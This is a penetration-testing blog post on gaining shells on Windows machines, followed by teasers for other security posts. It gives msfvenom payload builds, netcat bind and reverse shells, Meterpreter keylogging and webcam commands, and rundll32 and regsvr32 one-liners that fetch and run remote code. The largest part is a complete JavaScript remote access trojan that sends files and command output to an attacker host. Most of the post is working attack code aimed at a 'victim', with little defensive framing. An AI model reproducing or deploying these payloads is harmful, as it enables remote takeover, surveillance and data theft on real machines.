Exploitation using Shell


Metasploit Framework

Bind Shell

msfvenom -p windows/meterpreter/bind_tcp -f exe > bindshell.exe


Get victim to download and execute the file

Ensure the victim execute the bind shell

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.66.101
exploit



Hacker (192.168.66.102) initial the connection to victim machine on port 4444

Bind Shell using Netcat

Victim 
nc -lvp 8099 -e cmd.exe
Attacker 
nc -vn <victim_ip_address> 8099


Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.66.102 -f exe > reverseshell.exe



msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.66.102
exploit














Victim (192.168.66.1) initial the connection to Hacker machine on port 4444







Reverse Shell using Netcat

Victim



nc -vn <attacker_ip_address18099 -e cmd.exe

Attacker



nc -lvp 8099



Exploitation using Meterpreter


sysinfo 
screenshot
webcam_snap
keyscan_start
keyscan_dump
keyscan_stop







Malware Propagation



Browser - Virus Found!





























 Reverse Shell using Javascript 












Send HTTP request with rundll32



rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.56.102:8088/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}





Send HTTP request with regsvr32



regsvr32.exe /u /n /s /i:http://192.168.56.102:8088/file.sct scrobj.dll





Javascript returned in HTTP Request



while (true) {
    h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    h.SetTimeouts(0, 0, 0, 0);
    try {
        h.Open("GET", "http://192.168.56.102:80/rat", false);
        h.Send();
        c = h.ResponseText;
        if (c == "delete") {
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to Delete]");


            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;


            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.GetFile(d);
            f.Delete();


            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Delete Success]\n");
            continue;
        } else if (c == "download") {
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to download]");


            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;


            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.OpenTextFile(d, 1);
            g = f.ReadAll();
            f.Close();


            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/download", false);
            p.Send(g);
            continue;
        } else if (c == "read") {
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to Read]");


            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;


            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.OpenTextFile(d, 1);
            g = f.ReadAll();
            f.Close();


            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send(g + "\n");
            continue;
        } else if (c == "run") {
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to Run]");


            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;


            r = new ActiveXObject("WScript.Shell").Run(d, 0, true);
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Run Success]\n");
            continue;
        } else if (c == "upload") {
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Start to Upload]");


            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/uploadpath", false);
            g.Send();
            dpath = g.ResponseText;


            g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g2.SetTimeouts(0, 0, 0, 0);
            g2.Open("GET", "http://192.168.56.102:80/uploaddata", false);
            g2.Send();
            ddata = g2.ResponseText;


            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.CreateTextFile(dpath, true);
            f.WriteLine(ddata);
            f.Close();
            
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Upload Success]\n");
            continue;
        } else {
            r = new ActiveXObject("WScript.Shell").Exec(c);
            var so;
            while (!r.StdOut.AtEndOfStream) {
                so = r.StdOut.ReadAll()
            }
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send(so + "\n");
        }
    } catch (e1) {
        p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        p.SetTimeouts(0, 0, 0, 0);
        p.Open("POST", "http://192.168.56.102:80/rat", false);
        p.Send("[ERROR - No Output]\n");
    } 
}




























Popular posts from this blog









Remote Desktop Protocol (RDP) Security






Image







 Common Remote Desktop Protocol (RDP) Vulnerabilities   Terminal Services Encryption Level is Medium or Low  Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness  Terminal Services Doesn't Use Network Level Authentication (NLA) Only    Terminal Services Encryption Level is Medium or Low   Vulnerability Assessment:           Host Assessment:           Remediation:     Local Computer Policy/Computer Configuration/Administrative Templates/Windows Components/Remote Desktop Services/Remote Desktop Session Host/Security/Set client connection encryption level     Set client connection encryption level to High     Note:    High: The High setting encrypts data sent from the client to the server and from the server to the client by using strong 128-bit encryption. Use this encryption level in environments that contain only 128-bit clients (for example, clients that run Remote Desktop Connection). Clients that do not support this encryption level cannot connect to RD Se








Read more










Penetration Testing - Network






Image







    Manual Vulnerability Assessment   TCP/21: FTP   Anonymous FTP Enabled   anonymous guest     TCP/22: SSH  nmap -p 22 --script ssh2-enum-algos <ip_address>     SSH Weak Algorithms Supported    SSH Server CBC Mode Ciphers Enabled  ssh -oCiphers=<ciphers> <ip_address>   SSH Weak MAC Algorithms Enabled   ssh -oMACs=<algorithm> <ip_address>   SSH Protocol v1 Supported  ssh -1 <ip_address> -v     Hardening on SSH  Ciphers aes256-ctr,aes192-ctr,aes128-ctr MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com     TCP/23: Telnet   Unencrypted Telnet Server  telnet <ip_address> 23   TCP/25: SMTP   SMTP Service Cleartext Login Permitted  telnet <ip_address> 25 EHLO <ip_address> AUTH LOGIN    Mailserver answer to VRFY and EXPN requests  *   nc <ip_address> 25 EXPN root VRFY root     TCP/53: DNS   DNS Server Cache Snooping Remote Information Disclosure 








Read more










Damn Vulnerable Web Services (DVWS) - Walkthrough






Image







       Installation  Damn Vulnerable Web Services  (DVWS) is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.   https://github.com/snoopysecurity/dvws     WSDL Enumeration   Spider DVWS using Burp Suite and look for service.php          Requests processed by SOAP service include  check_user_information ,  owasp_apitop10 ,  population  and  return_price     XPATH Injection   User Login:  1' or '1'='1    User Password:  1' or '1'='1              Command Injection   Original Request    parameter value of name  is " find "   by default             Edited Request    change the parameter value of  name  from "find" to " dir "              Cross Site Tracing (XST)   Hint of " The NuSOAP Library service is vulnerable to a Cross-site scripting flaw " is given by DVWS. Exploit is published at exploit DB ( https://www.exploit-db.com/e








Read more










Offensive Security Testing Guide






Image







         This cheat sheet is the compilation of commands we learnt to exploit the vulnerable machines.  The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP).  So... Try Harder!      Information Gathering    Operating System   Windows  Interesting Path  "Documents and Settings"/Administrator/Desktop  file:///C:/xampp/readme_en.txt file:///C:/xampp/passwords.txt file:///C:/xampp/webdav/webdav.txt file:///C:/xampp/apache/conf/extra/httpd-dav.conf file:///C:/xampp/apache/conf/extra/httpd-xampp.conf file:///C:/xampp/apache/logs/access.log file:///C:/xampp/apache/logs/error.log file:///C:/xampp/security/webdav.htpasswd file:///C:/xampp/htdocs/dashboard/phpinfo.php file:///C:/xampp/phpmyadmin/config.inc.php file:///C:/xampp/php/logs/php_error_log file:///C:/xampp/mysql/bin/my.ini  C:\Users\<User>\AppData\Local\Temp  #Email Address C:\Users\<User>\AppData\Local\Microsoft\Outlook   Active Connection   netstat -anob #R








Read more










Server Message Block (SMB) Security






Image







     Common SMB related vulnerabilities   Microsoft Windows SMBv1 Multiple Vulnerabilities  SMB Signing Disabled  Microsoft Windows SMB NULL Session Authentication  Microsoft Windows SMB Shares Unprivileged Access          Network Discovery:   TCP port 5357 - Web Services on Devices API (WSDAPI)     File and Printer Sharing:   TCP port 135 - Remote Procedure Call (RPC)  TCP port 139 - NETBIOS Session Service  TCP port 445 - Server Message Block (SMB)          By disable NetBIOS over TCP/IP (TCP Port 139), NETBIOS name discovery will be prevented       Microsoft Windows SMBv1 Multiple Vulnerabilities   Vulnerability Assessment:       NSE script smb-protocols  can be used to check if the server supported NT LM 0.12 (SMBv1) .       Host Assessment:  Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters | ForEach-Object {Get-ItemProperty $_.pspath}           Remediation:  Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters








Read more










Host Configuration Assessment - Windows






Image







       OS Information Gathering  systeminfo wmic computersystem get domainrole   0 - Standalone workstation  1 - Member workstation  2 - Standalone server  3 - Member server  4 - Domain controller   secedit /export /cfg cfg.ini  > nul net user administrator > netuseradmin.txt auditpol.exe /get /category:* > auditpol.txt netsh advfirewall show allprofiles > firewall.txt net accounts > netaccount.txt gpresult /f /h evid/gporesult.html > nul accesschk /accepteula -q -a * > accesschk.txt    *Simplify the process with Scgary !          User Right Assignment  type cfg.ini | grep "^SeAuditPrivilege\|^SeCreatePagefilePrivilege\|^SeRemoteShutdownPrivilege\|^SeRemoteInteractiveLogonRight\|^SeEnableDelegationPrivilege\|^SeLockMemoryPrivilege\|^SeDenyNetworkLogonRight\|^SeChangeNotifyPrivilege\|^SeDebugPrivilege\|^SeDenyBatchLogonRight\|^SeCreateGlobalPrivilege\|^SeShutdownPrivilege\|^SeIncreaseQuotaPrivilege\|^SeTrustedCredManAccessPrivilege\|^SeDenyInteractiveLogonRight








Read more